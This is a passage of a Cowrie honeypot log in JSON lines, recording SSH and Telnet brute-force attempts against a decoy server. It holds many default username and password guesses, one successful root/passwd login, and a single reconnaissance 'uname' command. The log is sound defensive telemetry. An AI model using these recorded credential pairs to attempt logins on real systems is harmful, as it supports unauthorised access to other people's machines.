ssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:15:01.509727Z","src_ip":"212.227.235.229","session":"25450ebc8845"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55936,"dst_ip":"1.2.3.4","dst_port":22,"session":"2084c99cfa4a","protocol":"ssh","message":"New connection: 212.227.235.229:55936 (1.2.3.4:22) [session: 2084c99cfa4a]","sensor":"my-vps","timestamp":"2025-08-28T06:15:01.539223Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:15:01.540059Z","src_ip":"212.227.235.229","session":"2084c99cfa4a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:15:01.685210Z","src_ip":"212.227.235.229","session":"2084c99cfa4a"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"123456","message":"login attempt [uftp/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:15:02.090780Z","src_ip":"212.227.235.229","session":"25450ebc8845"}
{"eventid":"cowrie.login.failed","username":"awsgui","password":"awsgui","message":"login attempt [awsgui/awsgui] failed","sensor":"my-vps","timestamp":"2025-08-28T06:15:02.119842Z","src_ip":"212.227.235.229","session":"2084c99cfa4a"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:15:03.239099Z","src_ip":"212.227.235.229","session":"25450ebc8845"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:15:03.264521Z","src_ip":"212.227.235.229","session":"2084c99cfa4a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49346,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f9d63574f74","protocol":"ssh","message":"New connection: 212.227.125.160:49346 (1.2.3.4:22) [session: 7f9d63574f74]","sensor":"my-vps","timestamp":"2025-08-28T06:15:08.989332Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:15:09.043804Z","src_ip":"212.227.125.160","session":"7f9d63574f74"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:15:09.122574Z","src_ip":"212.227.125.160","session":"7f9d63574f74"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"dolphinscheduler","message":"login attempt [dolphinscheduler/dolphinscheduler] failed","sensor":"my-vps","timestamp":"2025-08-28T06:15:09.520092Z","src_ip":"212.227.125.160","session":"7f9d63574f74"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:15:10.627731Z","src_ip":"212.227.125.160","session":"7f9d63574f74"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51460,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2768d5a962f","protocol":"ssh","message":"New connection: 212.227.235.229:51460 (1.2.3.4:22) [session: d2768d5a962f]","sensor":"my-vps","timestamp":"2025-08-28T06:15:15.979656Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:15:15.980426Z","src_ip":"212.227.235.229","session":"d2768d5a962f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:15:16.125702Z","src_ip":"212.227.235.229","session":"d2768d5a962f"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"dolphinscheduler","message":"login attempt [dolphinscheduler/dolphinscheduler] failed","sensor":"my-vps","timestamp":"2025-08-28T06:15:16.564070Z","src_ip":"212.227.235.229","session":"d2768d5a962f"}
{"eventid":"cowrie.session.closed","duration":30.85344409942627,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:15:16.949959Z","src_ip":"212.227.235.229","session":"18f801e270b8"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:15:17.716303Z","src_ip":"212.227.235.229","session":"d2768d5a962f"}
{"eventid":"cowrie.session.closed","duration":31.141921520233154,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:15:17.849388Z","src_ip":"8.222.212.69","session":"335b8d58925e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49980,"dst_ip":"1.2.3.4","dst_port":22,"session":"c454322be40e","protocol":"ssh","message":"New connection: 212.227.125.160:49980 (1.2.3.4:22) [session: c454322be40e]","sensor":"my-vps","timestamp":"2025-08-28T06:15:23.506019Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:15:23.545940Z","src_ip":"212.227.125.160","session":"c454322be40e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:15:23.625078Z","src_ip":"212.227.125.160","session":"c454322be40e"}
{"eventid":"cowrie.login.success","username":"root","password":"passwd","message":"login attempt [root/passwd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:15:24.031695Z","src_ip":"212.227.125.160","session":"c454322be40e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:15:24.346569Z","src_ip":"212.227.125.160","session":"c454322be40e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:15:24.347358Z","src_ip":"212.227.125.160","session":"c454322be40e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:15:24.454247Z","src_ip":"212.227.125.160","session":"c454322be40e"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:15:24.455833Z","src_ip":"212.227.125.160","session":"c454322be40e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44207,"dst_ip":"1.2.3.4","dst_port":23,"session":"d7c04cf529ce","protocol":"telnet","message":"New connection: 212.227.235.229:44207 (1.2.3.4:23) [session: d7c04cf529ce]","sensor":"my-vps","timestamp":"2025-08-28T06:15:28.497849Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50426,"dst_ip":"1.2.3.4","dst_port":22,"session":"e33d6a8e2b6f","protocol":"ssh","message":"New connection: 217.72.205.35:50426 (1.2.3.4:22) [session: e33d6a8e2b6f]","sensor":"my-vps","timestamp":"2025-08-28T06:15:37.780234Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:15:37.781333Z","src_ip":"217.72.205.35","session":"e33d6a8e2b6f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59306,"dst_ip":"1.2.3.4","dst_port":22,"session":"27ffce7f8219","protocol":"ssh","message":"New connection: 212.227.125.160:59306 (1.2.3.4:22) [session: 27ffce7f8219]","sensor":"my-vps","timestamp":"2025-08-28T06:15:38.114054Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:15:38.147112Z","src_ip":"212.227.125.160","session":"27ffce7f8219"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:15:38.249651Z","src_ip":"212.227.125.160","session":"27ffce7f8219"}
{"eventid":"cowrie.login.failed","username":"yarn","password":"yarn","message":"login attempt [yarn/yarn] failed","sensor":"my-vps","timestamp":"2025-08-28T06:15:38.640049Z","src_ip":"212.227.125.160","session":"27ffce7f8219"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:15:39.810055Z","src_ip":"212.227.125.160","session":"27ffce7f8219"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46536,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6c15e7c52fd","protocol":"ssh","message":"New connection: 212.227.125.160:46536 (1.2.3.4:22) [session: e6c15e7c52fd]","sensor":"my-vps","timestamp":"2025-08-28T06:15:53.262261Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:15:53.295851Z","src_ip":"212.227.125.160","session":"e6c15e7c52fd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:15:53.375361Z","src_ip":"212.227.125.160","session":"e6c15e7c52fd"}
{"eventid":"cowrie.login.failed","username":"test2","password":"test2","message":"login attempt [test2/test2] failed","sensor":"my-vps","timestamp":"2025-08-28T06:15:53.793217Z","src_ip":"212.227.125.160","session":"e6c15e7c52fd"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:15:54.900001Z","src_ip":"212.227.125.160","session":"e6c15e7c52fd"}
{"eventid":"cowrie.session.closed","duration":31.763304710388184,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:16:00.261057Z","src_ip":"212.227.235.229","session":"d7c04cf529ce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54288,"dst_ip":"1.2.3.4","dst_port":22,"session":"390edb0d8b9a","protocol":"ssh","message":"New connection: 212.227.235.229:54288 (1.2.3.4:22) [session: 390edb0d8b9a]","sensor":"my-vps","timestamp":"2025-08-28T06:16:01.009731Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:16:01.010572Z","src_ip":"212.227.235.229","session":"390edb0d8b9a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46308,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb2d613461dc","protocol":"ssh","message":"New connection: 212.227.235.229:46308 (1.2.3.4:22) [session: fb2d613461dc]","sensor":"my-vps","timestamp":"2025-08-28T06:16:01.036412Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:16:01.037584Z","src_ip":"212.227.235.229","session":"fb2d613461dc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:16:01.158063Z","src_ip":"212.227.235.229","session":"390edb0d8b9a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:16:01.181961Z","src_ip":"212.227.235.229","session":"fb2d613461dc"}
{"eventid":"cowrie.login.failed","username":"yarn","password":"yarn","message":"login attempt [yarn/yarn] failed","sensor":"my-vps","timestamp":"2025-08-28T06:16:01.593674Z","src_ip":"212.227.235.229","session":"390edb0d8b9a"}
{"eventid":"cowrie.login.failed","username":"test2","password":"test2","message":"login attempt [test2/test2] failed","sensor":"my-vps","timestamp":"2025-08-28T06:16:01.616825Z","src_ip":"212.227.235.229","session":"fb2d613461dc"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:16:02.740307Z","src_ip":"212.227.235.229","session":"390edb0d8b9a"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:16:02.763705Z","src_ip":"212.227.235.229","session":"fb2d613461dc"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":59370,"dst_ip":"1.2.3.4","dst_port":23,"session":"e259baccd050","protocol":"telnet","message":"New connection: 8.222.212.69:59370 (1.2.3.4:23) [session: e259baccd050]","sensor":"my-vps","timestamp":"2025-08-28T06:16:11.967312Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37528,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f5548679d5f","protocol":"ssh","message":"New connection: 212.227.235.229:37528 (1.2.3.4:22) [session: 2f5548679d5f]","sensor":"my-vps","timestamp":"2025-08-28T06:16:15.641180Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:16:15.642038Z","src_ip":"212.227.235.229","session":"2f5548679d5f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-